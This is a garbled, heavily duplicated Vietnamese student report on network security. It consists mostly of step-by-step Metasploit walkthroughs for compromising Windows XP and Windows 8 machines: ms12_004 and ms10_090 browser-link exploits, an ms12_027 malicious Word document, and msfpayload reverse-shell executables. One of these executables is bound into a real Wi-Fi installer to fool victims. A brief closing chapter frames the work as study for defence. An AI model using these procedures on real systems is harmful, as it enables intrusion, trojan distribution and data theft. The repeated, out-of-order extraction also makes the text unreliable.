Khai baacuteo thocircng số srvhost lagrave địa chỉ ip của VPS Sau đoacute chọn Run module
Sau khi Module được chạy Metasploit sẽ tạo ra 1 đường link Khi victim truy cập đường
link nagravey thigrave sẽ bị xacircm nhập
62
Kiểm tra tiacutenh thagravenh cocircng bằng caacutech từ 1 maacutey XP được kết nối internet ta truy cập vagraveo
đường link trecircn
Ngay lập tức Metasloit sẽ gửi caacutec kết nối tới Victim
63
Khi coacute thocircng baacuteo 1 session đatilde được thiết lập lagrave ta đatilde thagravenh cocircng
Ta đatilde coacute thể xacircm nhập hoagraven toagraven vagraveo maacutey victim Xemtải filetạo filehelliplagravem gigrave tugravey yacute
64
Sau đacircy lagrave 1 số higravenh ảnh xacircm nhập vagraveo maacutey victim
Truy cập ổ đĩa trecircn maacutey Victim
Tải dữ liệu trecircn maacutey Victim
65
Kết thuacutec module xacircm nhập qua internet bằng matilde lỗi ms10_090 với phần mềm Metasploit
được cagravei đặt trecircn VPS
2257 XAcircM NHẬP WINDOWS 8 TỪ VPS
Cần chuẩn bị
- 1 maacutey Backtrack
- 1 VPS được cagravei sẵn Metasploit
Trecircn maacutey Backtrack Tạo 1 file thực thi để gửi cho victim Khi Victim chạy file nagravey thigrave sẽ
bị xacircm nhập
Để tạo file shel gotilde lệnh
Msfpayload windowsshell_reverse_tcp lhost=[IP VPS] lport=4455 X gt tmp[ten
file]exe
File shell nagravey sẽ đc lưu tại đường dẫn tmp
66
Sau đoacute đăng nhập vagraveo VPS khởi động metasploit vagrave cấu higravenh metasploit về chế độ lắng
nghe vagrave giữ caacutec kết nối
Gotilde caacutec lệnh
- Use exploitmultihander Chuyển về chế độ lắng nghe
- Set payload windowsshellreverse_tcp Chọn payload
- Set lhost[ip VPS] Cấu higravenh IP lắng nghe
- Set lport 4455 cấu higravenh port lắng nghe
Sau đoacute gotilde lệnh Exploit để bắt đầu
67
Việc cần lagravem bacircy giờ lagrave gửi file shell ban đầu tạo ở maacutey Backtrack cho Victim Mỗi 1
victim chạy file shell thigrave VPS sẽ bắt được 1 kết nối để xacircm nhập
Giờ ta sẽ cho maacutey windows 8 chạy file shell
Vagrave ngay lập tức VPS sẽ bắt được kết nối vagrave xacircm nhập
Dugraveng lệnh mkdir Trung để tạo 1 thư mục coacute tecircn Trung trecircn magraven higravenh maacutey windows 8
68
Kiểm tra trecircn magraven higravenh maacutey windows 8 ta đatilde thấy thư mục Trung
Kết thuacutec module xacircm nhập maacutey tiacutenh windwos 8 từ VPS
69
CHƯƠNG 3 NHẬN XEacuteT- ĐAacuteNH GIAacute
31 ƯU ĐIỂM
Đề tagravei an ninh mạng giuacutep cho em hiểu quaacute trigravenh tấn cocircng chuacuteng ta cần phải lagravem những gigrave
phải chuẩn bị thu thập những thocircng tin như thế nagraveo vagrave từ đacircu Sau đoacute lagrave quaacute trigravenh tấn cocircng
vagraveo hệ thống maacutey tiacutenh nạn nhacircn Từ đoacute biết được caacutech thức cũng như quaacute trigravenh hacker sẽ
lagravem gigrave qua đoacute chuacuteng ta sẽ biết được caacutech phograveng thủ vagrave triển khai hệ thống an ninh mạng
giuacutep cho hệ thống của ta an toagraven trước những cuộc tấn cocircng
32 KHUYẾT ĐIỂM
Đề tagravei nagravey em mới được lagravem quen vagrave tigravem hiểu necircn đối tượng để xacircm nhập em vẫn dugraveng
những hệ điều hagravenh cũ như windows XP Windows 7 Đến hiện nay Microsoft đatilde khai tử
hệ điều hagravenh XP necircn những matilde lỗi em thực hiện ở trecircn đatilde mất đi 1 phần nagraveo yacute nghĩa Qua
đoacute em thấy được sự rộng lớn của an ninh mạng Phải thay đổi vagrave cập nhật từng luacutec
33 KẾT LUẬN
Trong quaacute trigravenh nghiecircn cứu đề tagravei an ninh mạng em nhận thấy rằng đacircy lagrave một trong
những lĩnh vực rất đa dạng vagrave phong phuacute vagrave thật sự quan trọng đặc biệt lagrave vấn đề lagravem
sao cho hệ thống maacutey tiacutenh hoạt động trơn tru traacutenh được đe dọa những cuộc tấn cocircng
của hacker Noacute khocircng những gacircy nguy hại đến người dugraveng magrave đặc biệt lagrave những doanh
nghiệp những tập đoagraven ngacircn hagraveng tagravei chiacutenh Quaacute trigravenh tigravem hiểu vagrave nghiecircn cứu tại
Trung Tacircm Đagraveo Tạo Quản Trị Mạng amp An Ninh Mạng Quốc tế ATHENA chỉ vỏn vẹn
hai thaacuteng vagrave cograven rất nhiều kiến thức khaacutec liecircn quan em nhận thấy migravenh cần phải tiếp tục
nỗ lực hơn nữa nhưng đề tagravei an ninh mạng thật sự rất locirci cuốn vagrave hấp dẫn đối với em
Kiến thức thực tiễn rất đa dạng vagrave phong phuacute so với những gigrave em học được vagrave nghiecircn
cứu em sẽ nỗ lực cố gắng hơn nữa bởi mong ước của em lagrave trở thagravenh chuyecircn gia an
ninh mạng cao cấp
38
Cuốt cugraveng gotilde lệnh ldquo Exploitrdquo để bắt đầu khai thaacutec lỗi
Luacutec nagravey maacutey BackTrack sẽ tạo ra 1 đương link Khi maacutey XP truy cập vagraveo đường link nagravey
thigrave sẽ bị xacircm nhập
39
Trecircn maacutey XP mở trigravenh duyệt IE vagrave truy cập vagraveo đường link đoacute
Ngay lập tức maacutey BackTrac sẽ gửi caacutec đoạn matilde độc để xacircm nhập dựa vagraveo lỗ hổng
40
Khi maacutey Backtrack thocircng baacuteo đatilde coacute 1 phiecircn kết nối thigrave luacutec đoacute ta đatilde coacute thể xacircm nhập vagraveo
maacutey nạn nhacircn
Dugraveng lệnh ldquosessionsrdquo để kiểm tra thocircng tin phiecircn kết nối
41
Tiếp theo dugraveng lệnh ldquosession ndashI [ID của phiecircn kết nối]rdquo để xacircm nhập vagraveo maacutey nạn
nhacircn
Tới đacircy ta đatilde coacute thể lagravem chủ hệ thống của maacutey nạn nhacircn
- Dugraveng lệnh ldquogetuidrdquo để lấy thocircng tin Username
- Dugraveng lện ldquosysinfordquo để xem thocircng tin maacutey nạn nhacircn
- Dugraveng lecircnh ldquoshellrdquo để xacircm nhacircp hệ thống
42
Thử tạo 1 thư mục coacute tecircn ldquotrungrdquo bằng lệnh ldquomd trungrdquo
Ngay lập tức trecircn magraven higravenh maacutey XP sẽ coacute thư mục ldquotrungrdquo
43
Như vậy ta đatilde hoagraven thagravenh khai thaacutec matilde lỗi ms12_004
2254 LỖI MS12_027
Lỗi MS12_027 lagrave lỗi magrave thocircng qua bộ cocircng cụ Office hacker sẽ tấn cocircng vagraveo hệ thống vagrave
chiếm quyền điều khiển Trong caacutec phiecircn bản Office phổ biến (từ 2003 2007 2010) đều diacutenh
lỗ hổng nagravey
Bắt đầu quaacute trigravenh tấn cocircng Ta khởi động Metasploit bằng cacircu lệnh ldquomsfconsolerdquo trecircn
Backtrack
44
Dugraveng lệnh ldquosearch ms12_027rdquo để tigravem module của matilde lỗi trong Metasploit
Sau khi coacute đường dẫn của module Dugraveng lệnh ldquo use [đường dẫn module]rdquo để sử dụng
45
Gotilde lệnh ldquo Show optionsrdquo để xem những thuộc tiacutenh cần thiết lập
Cần tạo 1 file giả coacute định dạng doc để lagravem cocircng cụ xacircm nhập maacutey nạn nhacircn
Dugraveng lệnh ldquo Set filename [ten file]docrdquo
46
Tiếp đoacute lần lượt gotilde lệnh
- ldquoSet payload windowsmeterpreterreverse_tcprdquo thiết lập payload của
module
- ldquoSet LHOST [ip maacutey Backtrack]rdquo Thiết lập ip maacutey lắng nghe
Sau đoacute gotilde lệnh ldquoExploitrdquo để hoagraven thagravenh việc thiết lập thocircng tin vagrave tạo file giả
47
Maacutey Backtrack luacutec nagravey sẽ tạo ra file doc vagrave thocircng baacuteo đường dẫn file được tạo ra
Kế tiếp ta cần thiết lập 1 trigravenh lắng nghe vagrave điều khiển maacutey nạn nhacircn ( sau khi maacutey nạn
nhacircn bị nhiễm matilde độc trong file doc)
Dugraveng lệnh ldquouse exploitmultihandlerrdquo
48
Sau đoacute thiết lập caacutec thocircng số
- ldquoSet payload windowsmeterpreterreverse_tcprdquo
- ldquoSet LHOST [ip maacutey Backtrack]rdquo
Sau đoacute dugraveng lệnh ldquoExploitrdquo để bắt đầu lắng nghe vagrave thiết lập phiecircn kết nối với maacutey nạn
nhacircn để xacircm nhập ngay khi maacutey nạn nhacircn bị nhiễm matilde độc khi mở file doc
Tới đacircy đatilde hoagraven tất việc thiết lập vagrave triển khai xacircm nhập Giờ ta sẽ chờ maacutey nạn nhacircn bị
49
nhiễm matilde độc Caacutech dễ nhất lagrave đưa file doc lecircn trigravenh duyệt web để nạn nhacircn tải về
Copy file doc được tạo vagraveo thư mục varwww Mở console khaacutec lecircnh gotilde lệnh
ldquocp [đường dẫn tới file doc] varwwwrdquo
Sau đoacute triển khai web server bằng lệnh
ldquoetcinitdapache 2 startrdquo
Từ maacutey XP truy cập vagraveo địa chỉ ldquo http[ip maacutey backtrack][file doc]rdquo 1 cửa sổ ldquo file
downloadrdquo hiện ra
50
Khi file doc được mở tại maacutey nạn nhacircn Ngay luacutec nagravey maacutey Backtrack sẽ kết nối tới maacutey
nạn nhacircn vagrave bắt đầu xacircm nhập Khi coacute thocircng baacuteo 1 session đatilde được thiết lập thigrave ta đatilde coacute
thể chiểm quyền user đang đăng nhập trecircn maacutey nạn nhacircn
51
- Dugraveng lệnh ldquogetuidrdquo để lấy thocircng tin Username
- Dugraveng lện ldquosysinfordquo để xem thocircng tin maacutey nạn nhacircn
- Dugraveng lecircnh ldquoshellrdquo để xacircm nhacircp hệ thống
52
Tạo 1 thư mục tecircn ldquotrungrdquo bằng lệnh ldquomd trungrdquo
Kiểm tra trecircn magraven higravenh maacutey XP ta thấy thư mục vừa đươc tạo từ maacutey Backtrack
Tới đacircy ta đatilde kết thuacutec quaacute trigravenh xacircm nhập qua matilde lỗi ms12_027
2255 MỞ PORT TREN MODEMTẤN CONG NGOAI MẠNG
INTERNET
53
Đầu tiecircn dugraveng lệnh ldquopingrdquo để kiểm tra kết nối internet
Sau đoacute dugraveng lệnh ldquomsfpayload windowsshell_reverse_tcp LHOST=[ip mặt ngoagravei maacutey
Backtrack] LPORT=[port sẽ mở trong modem] X gt tmp[tecircn file]exerdquo để tạo 1 file shell
(file thực thi) Sau nagravey ta sẽ gửi file nagravey cho nạn nhacircn để kết nối với maacutey nạn nhacircn Trong
higravenh dưới
Lhost=15428158 lagrave ip mặt ngoagravei của maacutey Backtrack( Vagraveo trang whatismyipcom để xem
ip nagravey)
Lport=4455 lagrave port được chỉ định để lắng nghe phiecircn kết nối Port nagravey sẽ được mở trong
modem internet vagrave được trả về địa chỉ ip local của maacutey Backtrack
tmpMypublickWifiexe lagrave file shell ta tạo ra từ cacircu lệnh nagravey coacute tecircn lagrave ldquoMypublicWifirdquo vagrave
được lưu ở đường dẫn tmp
Dugraveng lệnh ldquoifconfigrdquo để xem ip của maacutey BackTrack trong mạng Lan Sau nagravey khi mở
port ta sẽ trỏ port đoacute về ip nagravey
54
Đăng nhập vagraveo modem từ trigravenh duyệt web vagraveo mục Nat vagrave mở port khi natildey ra đatilde chọn
55
Tiếp theo mở cửa sổ console khaacutec vagrave khởi động Metasploit bằng cacircu lệnh ldquomsfconsolerdquo
Sử dụng module multihander trong Metasploit để giữ kết nối
Gotilde lệnh ldquouse exploitmultihanderrdquo
Lần lượt gotilde caacutec lệnh
- ldquoSet payload windowsshellreverse_tcprdquo để chọn payload cho module
- ldquoSet lhost [ip mặt ngoagravei maacutey BackTrack]rdquo Cấu higravenh ip lắng nghe nhận kết nối
trecircn mạng
- ldquoSet lport [port được mở]rdquo Cấu higravenh port lắng nghe
Dugraveng lệnh ldquoShow optionsrdquo để kiểm tra lại thocircng tin đatilde cấu higravenh
56
Tới đacircy ta dugraveng lệnh ldquoexploitrdquo để bắt đầu lắng nghe
Việc cograven lại lagrave chờ nạn nhacircn bị nhiễm matilde độc khi chạy file shell ta đatilde tạo ra Vấn đề lagrave
lagravem sao để nạn nhacircn thực thi file đoacute File shell nằm trong đường dẫn ldquotmpmypublicwifirdquo
magrave khi natildey ta đatilde tạo
57
Ở đacircy ta gheacutep file ldquomypublicwifiexerdquo do Backtrack tạo ra với 1 file setup của phần mềm
phaacutet wifi coacute tecircn ldquomypublicwifiexerdquo thật sự khaacutec Việc nagravey sẽ dễ đaacutenh lừa được nạn nhacircn
hơn Khi gheacutep xong ta sẽ coacute 1 file setup của phần mềm mypublicwifi thật sự tuy nhiecircn
khi nạn nhacircn chạy file setup nagravey cũng sẽ đồng thời chạy file do Backtrack tạo ra Để gheacutep
được ta coacute thể tham khảo trecircn mạng với từ khoacutea ldquobind two exerdquo
58
Khi nạn nhacircn chạy file setup nagravey thigrave maacutey Backtrack lập tức sẽ tạo kết nối với maacutey nạn
nhacircn Khi coacute thocircng baacuteo 1 sessions được thiết lập thigrave ta đatilde xacircm nhập được vagraveo maacutey nạn
nhacircn
Thử tạo 1 thư mục trecircn ổ đĩa ldquoCrdquo của maacutey nạn nhacircn bằng lệnh
ldquoCd C rdquo Lệnh nagravey đưa vị triacute lagravem việc về ổ C
ldquomkdir Trungrdquo Lệnh nagravey tạo thư mục tecircn Trung
Vagrave kiểm tra trecircn maacutey nạn nhacircn
59
Tới đacircy ta kết thuacutec việc tấn cocircng maacutey nạn nhacircn ngoagravei mạng internet bằng Metasploit qua
việc tạo file shell chứa matilde độc
2256 CAgraveI ĐẶT METASPLOIT TREN VPS SỬ DỤNG GIAO DIỆN
WEB CỦA METASPLOIT KHAI THAacuteC MAtilde LỖI MS10_090 TỪ
VPS
Từ VPS tải phần mềm chương trigravenh Metasploit từ web site httpmetasploitcom Cagravei
đặt như caacutec phần mềm khaacutec Chuacute yacute tắt tường lửa vagrave chương trigravenh anti virut nếu coacute
Đăng nhập vagraveo VPS mở giao diện web của Metasploit Community
Chọn Start-gtprogram-gtmetasploit-gtAccess metasploit UI
60
Chọn project ở đacircy migravenh để project default
Click Module -gtsearch
Gotilde vagraveo ocirc tigravem kiếm matilde lỗi ms10_090 Sau đoacute click vagraveo module hiện ra
61
Khai baacuteo thocircng số srvhost lagrave địa chỉ ip của VPS Sau đoacute chọn Run module
Sau khi Module được chạy Metasploit sẽ tạo ra 1 đường link Khi victim truy cập đường
link nagravey thigrave sẽ bị xacircm nhập
62
Kiểm tra tiacutenh thagravenh cocircng bằng caacutech từ 1 maacutey XP được kết nối internet ta truy cập vagraveo
đường link trecircn
Ngay lập tức Metasloit sẽ gửi caacutec kết nối tới Victim
63
Khi coacute thocircng baacuteo 1 session đatilde được thiết lập lagrave ta đatilde thagravenh cocircng
Ta đatilde coacute thể xacircm nhập hoagraven toagraven vagraveo maacutey victim Xemtải filetạo filehelliplagravem gigrave tugravey yacute
64
Sau đacircy lagrave 1 số higravenh ảnh xacircm nhập vagraveo maacutey victim
Truy cập ổ đĩa trecircn maacutey Victim
Tải dữ liệu trecircn maacutey Victim
65
Kết thuacutec module xacircm nhập qua internet bằng matilde lỗi ms10_090 với phần mềm Metasploit
được cagravei đặt trecircn VPS
2257 XAcircM NHẬP WINDOWS 8 TỪ VPS
Cần chuẩn bị
- 1 maacutey Backtrack
- 1 VPS được cagravei sẵn Metasploit
Trecircn maacutey Backtrack Tạo 1 file thực thi để gửi cho victim Khi Victim chạy file nagravey thigrave sẽ
bị xacircm nhập
Để tạo file shel gotilde lệnh
Msfpayload windowsshell_reverse_tcp lhost=[IP VPS] lport=4455 X gt tmp[ten
file]exe
File shell nagravey sẽ đc lưu tại đường dẫn tmp
66
Sau đoacute đăng nhập vagraveo VPS khởi động metasploit vagrave cấu higravenh metasploit về chế độ lắng
nghe vagrave giữ caacutec kết nối
Gotilde caacutec lệnh
- Use exploitmultihander Chuyển về chế độ lắng nghe
- Set payload windowsshellreverse_tcp Chọn payload
- Set lhost[ip VPS] Cấu higravenh IP lắng nghe
- Set lport 4455 cấu higravenh port lắng nghe
Sau đoacute gotilde lệnh Exploit để bắt đầu
67
Việc cần lagravem bacircy giờ lagrave gửi file shell ban đầu tạo ở maacutey Backtrack cho Victim Mỗi 1
victim chạy file shell thigrave VPS sẽ bắt được 1 kết nối để xacircm nhập
Giờ ta sẽ cho maacutey windows 8 chạy file shell
Vagrave ngay lập tức VPS sẽ bắt được kết nối vagrave xacircm nhập
Dugraveng lệnh mkdir Trung để tạo 1 thư mục coacute tecircn Trung trecircn magraven higravenh maacutey windows 8
68
Kiểm tra trecircn magraven higravenh maacutey windows 8 ta đatilde thấy thư mục Trung
Kết thuacutec module xacircm nhập maacutey tiacutenh windwos 8 từ VPS
69
CHƯƠNG 3 NHẬN XEacuteT- ĐAacuteNH GIAacute
31 ƯU ĐIỂM
Đề tagravei an ninh mạng giuacutep cho em hiểu quaacute trigravenh tấn cocircng chuacuteng ta cần phải lagravem những gigrave
phải chuẩn bị thu thập những thocircng tin như thế nagraveo vagrave từ đacircu Sau đoacute lagrave quaacute trigravenh tấn cocircng
vagraveo hệ thống maacutey tiacutenh nạn nhacircn Từ đoacute biết được caacutech thức cũng như quaacute trigravenh hacker sẽ
lagravem gigrave qua đoacute chuacuteng ta sẽ biết được caacutech phograveng thủ vagrave triển khai hệ thống an ninh mạng
giuacutep cho hệ thống của ta an toagraven trước những cuộc tấn cocircng
32 KHUYẾT ĐIỂM
Đề tagravei nagravey em mới được lagravem quen vagrave tigravem hiểu necircn đối tượng để xacircm nhập em vẫn dugraveng
những hệ điều hagravenh cũ như windows XP Windows 7 Đến hiện nay Microsoft đatilde khai tử
hệ điều hagravenh XP necircn những matilde lỗi em thực hiện ở trecircn đatilde mất đi 1 phần nagraveo yacute nghĩa Qua
đoacute em thấy được sự rộng lớn của an ninh mạng Phải thay đổi vagrave cập nhật từng luacutec
33 KẾT LUẬN
Trong quaacute trigravenh nghiecircn cứu đề tagravei an ninh mạng em nhận thấy rằng đacircy lagrave một trong
những lĩnh vực rất đa dạng vagrave phong phuacute vagrave thật sự quan trọng đặc biệt lagrave vấn đề lagravem
sao cho hệ thống maacutey tiacutenh hoạt động trơn tru traacutenh được đe dọa những cuộc tấn cocircng
của hacker Noacute khocircng những gacircy nguy hại đến người dugraveng magrave đặc biệt lagrave những doanh
nghiệp những tập đoagraven ngacircn hagraveng tagravei chiacutenh Quaacute trigravenh tigravem hiểu vagrave nghiecircn cứu tại
Trung Tacircm Đagraveo Tạo Quản Trị Mạng amp An Ninh Mạng Quốc tế ATHENA chỉ vỏn vẹn
hai thaacuteng vagrave cograven rất nhiều kiến thức khaacutec liecircn quan em nhận thấy migravenh cần phải tiếp tục
nỗ lực hơn nữa nhưng đề tagravei an ninh mạng thật sự rất locirci cuốn vagrave hấp dẫn đối với em
Kiến thức thực tiễn rất đa dạng vagrave phong phuacute so với những gigrave em học được vagrave nghiecircn
cứu em sẽ nỗ lực cố gắng hơn nữa bởi mong ước của em lagrave trở thagravenh chuyecircn gia an
ninh mạng cao cấp
39
Trecircn maacutey XP mở trigravenh duyệt IE vagrave truy cập vagraveo đường link đoacute
Ngay lập tức maacutey BackTrac sẽ gửi caacutec đoạn matilde độc để xacircm nhập dựa vagraveo lỗ hổng
40
Khi maacutey Backtrack thocircng baacuteo đatilde coacute 1 phiecircn kết nối thigrave luacutec đoacute ta đatilde coacute thể xacircm nhập vagraveo
maacutey nạn nhacircn
Dugraveng lệnh ldquosessionsrdquo để kiểm tra thocircng tin phiecircn kết nối
41
Tiếp theo dugraveng lệnh ldquosession ndashI [ID của phiecircn kết nối]rdquo để xacircm nhập vagraveo maacutey nạn
nhacircn
Tới đacircy ta đatilde coacute thể lagravem chủ hệ thống của maacutey nạn nhacircn
- Dugraveng lệnh ldquogetuidrdquo để lấy thocircng tin Username
- Dugraveng lện ldquosysinfordquo để xem thocircng tin maacutey nạn nhacircn
- Dugraveng lecircnh ldquoshellrdquo để xacircm nhacircp hệ thống
42
Thử tạo 1 thư mục coacute tecircn ldquotrungrdquo bằng lệnh ldquomd trungrdquo
Ngay lập tức trecircn magraven higravenh maacutey XP sẽ coacute thư mục ldquotrungrdquo
43
Như vậy ta đatilde hoagraven thagravenh khai thaacutec matilde lỗi ms12_004
2254 LỖI MS12_027
Lỗi MS12_027 lagrave lỗi magrave thocircng qua bộ cocircng cụ Office hacker sẽ tấn cocircng vagraveo hệ thống vagrave
chiếm quyền điều khiển Trong caacutec phiecircn bản Office phổ biến (từ 2003 2007 2010) đều diacutenh
lỗ hổng nagravey
Bắt đầu quaacute trigravenh tấn cocircng Ta khởi động Metasploit bằng cacircu lệnh ldquomsfconsolerdquo trecircn
Backtrack
44
Dugraveng lệnh ldquosearch ms12_027rdquo để tigravem module của matilde lỗi trong Metasploit
Sau khi coacute đường dẫn của module Dugraveng lệnh ldquo use [đường dẫn module]rdquo để sử dụng
45
Gotilde lệnh ldquo Show optionsrdquo để xem những thuộc tiacutenh cần thiết lập
Cần tạo 1 file giả coacute định dạng doc để lagravem cocircng cụ xacircm nhập maacutey nạn nhacircn
Dugraveng lệnh ldquo Set filename [ten file]docrdquo
46
Tiếp đoacute lần lượt gotilde lệnh
- ldquoSet payload windowsmeterpreterreverse_tcprdquo thiết lập payload của
module
- ldquoSet LHOST [ip maacutey Backtrack]rdquo Thiết lập ip maacutey lắng nghe
Sau đoacute gotilde lệnh ldquoExploitrdquo để hoagraven thagravenh việc thiết lập thocircng tin vagrave tạo file giả
47
Maacutey Backtrack luacutec nagravey sẽ tạo ra file doc vagrave thocircng baacuteo đường dẫn file được tạo ra
Kế tiếp ta cần thiết lập 1 trigravenh lắng nghe vagrave điều khiển maacutey nạn nhacircn ( sau khi maacutey nạn
nhacircn bị nhiễm matilde độc trong file doc)
Dugraveng lệnh ldquouse exploitmultihandlerrdquo
48
Sau đoacute thiết lập caacutec thocircng số
- ldquoSet payload windowsmeterpreterreverse_tcprdquo
- ldquoSet LHOST [ip maacutey Backtrack]rdquo
Sau đoacute dugraveng lệnh ldquoExploitrdquo để bắt đầu lắng nghe vagrave thiết lập phiecircn kết nối với maacutey nạn
nhacircn để xacircm nhập ngay khi maacutey nạn nhacircn bị nhiễm matilde độc khi mở file doc
Tới đacircy đatilde hoagraven tất việc thiết lập vagrave triển khai xacircm nhập Giờ ta sẽ chờ maacutey nạn nhacircn bị
49
nhiễm matilde độc Caacutech dễ nhất lagrave đưa file doc lecircn trigravenh duyệt web để nạn nhacircn tải về
Copy file doc được tạo vagraveo thư mục varwww Mở console khaacutec lecircnh gotilde lệnh
ldquocp [đường dẫn tới file doc] varwwwrdquo
Sau đoacute triển khai web server bằng lệnh
ldquoetcinitdapache 2 startrdquo
Từ maacutey XP truy cập vagraveo địa chỉ ldquo http[ip maacutey backtrack][file doc]rdquo 1 cửa sổ ldquo file
downloadrdquo hiện ra
50
Khi file doc được mở tại maacutey nạn nhacircn Ngay luacutec nagravey maacutey Backtrack sẽ kết nối tới maacutey
nạn nhacircn vagrave bắt đầu xacircm nhập Khi coacute thocircng baacuteo 1 session đatilde được thiết lập thigrave ta đatilde coacute
thể chiểm quyền user đang đăng nhập trecircn maacutey nạn nhacircn
51
- Dugraveng lệnh ldquogetuidrdquo để lấy thocircng tin Username
- Dugraveng lện ldquosysinfordquo để xem thocircng tin maacutey nạn nhacircn
- Dugraveng lecircnh ldquoshellrdquo để xacircm nhacircp hệ thống
52
Tạo 1 thư mục tecircn ldquotrungrdquo bằng lệnh ldquomd trungrdquo
Kiểm tra trecircn magraven higravenh maacutey XP ta thấy thư mục vừa đươc tạo từ maacutey Backtrack
Tới đacircy ta đatilde kết thuacutec quaacute trigravenh xacircm nhập qua matilde lỗi ms12_027
2255 MỞ PORT TREN MODEMTẤN CONG NGOAI MẠNG
INTERNET
53
Đầu tiecircn dugraveng lệnh ldquopingrdquo để kiểm tra kết nối internet
Sau đoacute dugraveng lệnh ldquomsfpayload windowsshell_reverse_tcp LHOST=[ip mặt ngoagravei maacutey
Backtrack] LPORT=[port sẽ mở trong modem] X gt tmp[tecircn file]exerdquo để tạo 1 file shell
(file thực thi) Sau nagravey ta sẽ gửi file nagravey cho nạn nhacircn để kết nối với maacutey nạn nhacircn Trong
higravenh dưới
Lhost=15428158 lagrave ip mặt ngoagravei của maacutey Backtrack( Vagraveo trang whatismyipcom để xem
ip nagravey)
Lport=4455 lagrave port được chỉ định để lắng nghe phiecircn kết nối Port nagravey sẽ được mở trong
modem internet vagrave được trả về địa chỉ ip local của maacutey Backtrack
tmpMypublickWifiexe lagrave file shell ta tạo ra từ cacircu lệnh nagravey coacute tecircn lagrave ldquoMypublicWifirdquo vagrave
được lưu ở đường dẫn tmp
Dugraveng lệnh ldquoifconfigrdquo để xem ip của maacutey BackTrack trong mạng Lan Sau nagravey khi mở
port ta sẽ trỏ port đoacute về ip nagravey
54
Đăng nhập vagraveo modem từ trigravenh duyệt web vagraveo mục Nat vagrave mở port khi natildey ra đatilde chọn
55
Tiếp theo mở cửa sổ console khaacutec vagrave khởi động Metasploit bằng cacircu lệnh ldquomsfconsolerdquo
Sử dụng module multihander trong Metasploit để giữ kết nối
Gotilde lệnh ldquouse exploitmultihanderrdquo
Lần lượt gotilde caacutec lệnh
- ldquoSet payload windowsshellreverse_tcprdquo để chọn payload cho module
- ldquoSet lhost [ip mặt ngoagravei maacutey BackTrack]rdquo Cấu higravenh ip lắng nghe nhận kết nối
trecircn mạng
- ldquoSet lport [port được mở]rdquo Cấu higravenh port lắng nghe
Dugraveng lệnh ldquoShow optionsrdquo để kiểm tra lại thocircng tin đatilde cấu higravenh
56
Tới đacircy ta dugraveng lệnh ldquoexploitrdquo để bắt đầu lắng nghe
Việc cograven lại lagrave chờ nạn nhacircn bị nhiễm matilde độc khi chạy file shell ta đatilde tạo ra Vấn đề lagrave
lagravem sao để nạn nhacircn thực thi file đoacute File shell nằm trong đường dẫn ldquotmpmypublicwifirdquo
magrave khi natildey ta đatilde tạo
57
Ở đacircy ta gheacutep file ldquomypublicwifiexerdquo do Backtrack tạo ra với 1 file setup của phần mềm
phaacutet wifi coacute tecircn ldquomypublicwifiexerdquo thật sự khaacutec Việc nagravey sẽ dễ đaacutenh lừa được nạn nhacircn
hơn Khi gheacutep xong ta sẽ coacute 1 file setup của phần mềm mypublicwifi thật sự tuy nhiecircn
khi nạn nhacircn chạy file setup nagravey cũng sẽ đồng thời chạy file do Backtrack tạo ra Để gheacutep
được ta coacute thể tham khảo trecircn mạng với từ khoacutea ldquobind two exerdquo
58
Khi nạn nhacircn chạy file setup nagravey thigrave maacutey Backtrack lập tức sẽ tạo kết nối với maacutey nạn
nhacircn Khi coacute thocircng baacuteo 1 sessions được thiết lập thigrave ta đatilde xacircm nhập được vagraveo maacutey nạn
nhacircn
Thử tạo 1 thư mục trecircn ổ đĩa ldquoCrdquo của maacutey nạn nhacircn bằng lệnh
ldquoCd C rdquo Lệnh nagravey đưa vị triacute lagravem việc về ổ C
ldquomkdir Trungrdquo Lệnh nagravey tạo thư mục tecircn Trung
Vagrave kiểm tra trecircn maacutey nạn nhacircn
59
Tới đacircy ta kết thuacutec việc tấn cocircng maacutey nạn nhacircn ngoagravei mạng internet bằng Metasploit qua
việc tạo file shell chứa matilde độc
2256 CAgraveI ĐẶT METASPLOIT TREN VPS SỬ DỤNG GIAO DIỆN
WEB CỦA METASPLOIT KHAI THAacuteC MAtilde LỖI MS10_090 TỪ
VPS
Từ VPS tải phần mềm chương trigravenh Metasploit từ web site httpmetasploitcom Cagravei
đặt như caacutec phần mềm khaacutec Chuacute yacute tắt tường lửa vagrave chương trigravenh anti virut nếu coacute
Đăng nhập vagraveo VPS mở giao diện web của Metasploit Community
Chọn Start-gtprogram-gtmetasploit-gtAccess metasploit UI
60
Chọn project ở đacircy migravenh để project default
Click Module -gtsearch
Gotilde vagraveo ocirc tigravem kiếm matilde lỗi ms10_090 Sau đoacute click vagraveo module hiện ra
61
Khai baacuteo thocircng số srvhost lagrave địa chỉ ip của VPS Sau đoacute chọn Run module
Sau khi Module được chạy Metasploit sẽ tạo ra 1 đường link Khi victim truy cập đường
link nagravey thigrave sẽ bị xacircm nhập
62
Kiểm tra tiacutenh thagravenh cocircng bằng caacutech từ 1 maacutey XP được kết nối internet ta truy cập vagraveo
đường link trecircn
Ngay lập tức Metasloit sẽ gửi caacutec kết nối tới Victim
63
Khi coacute thocircng baacuteo 1 session đatilde được thiết lập lagrave ta đatilde thagravenh cocircng
Ta đatilde coacute thể xacircm nhập hoagraven toagraven vagraveo maacutey victim Xemtải filetạo filehelliplagravem gigrave tugravey yacute
64
Sau đacircy lagrave 1 số higravenh ảnh xacircm nhập vagraveo maacutey victim
Truy cập ổ đĩa trecircn maacutey Victim
Tải dữ liệu trecircn maacutey Victim
65
Kết thuacutec module xacircm nhập qua internet bằng matilde lỗi ms10_090 với phần mềm Metasploit
được cagravei đặt trecircn VPS
2257 XAcircM NHẬP WINDOWS 8 TỪ VPS
Cần chuẩn bị
- 1 maacutey Backtrack
- 1 VPS được cagravei sẵn Metasploit
Trecircn maacutey Backtrack Tạo 1 file thực thi để gửi cho victim Khi Victim chạy file nagravey thigrave sẽ
bị xacircm nhập
Để tạo file shel gotilde lệnh
Msfpayload windowsshell_reverse_tcp lhost=[IP VPS] lport=4455 X gt tmp[ten
file]exe
File shell nagravey sẽ đc lưu tại đường dẫn tmp
66
Sau đoacute đăng nhập vagraveo VPS khởi động metasploit vagrave cấu higravenh metasploit về chế độ lắng
nghe vagrave giữ caacutec kết nối
Gotilde caacutec lệnh
- Use exploitmultihander Chuyển về chế độ lắng nghe
- Set payload windowsshellreverse_tcp Chọn payload
- Set lhost[ip VPS] Cấu higravenh IP lắng nghe
- Set lport 4455 cấu higravenh port lắng nghe
Sau đoacute gotilde lệnh Exploit để bắt đầu
67
Việc cần lagravem bacircy giờ lagrave gửi file shell ban đầu tạo ở maacutey Backtrack cho Victim Mỗi 1
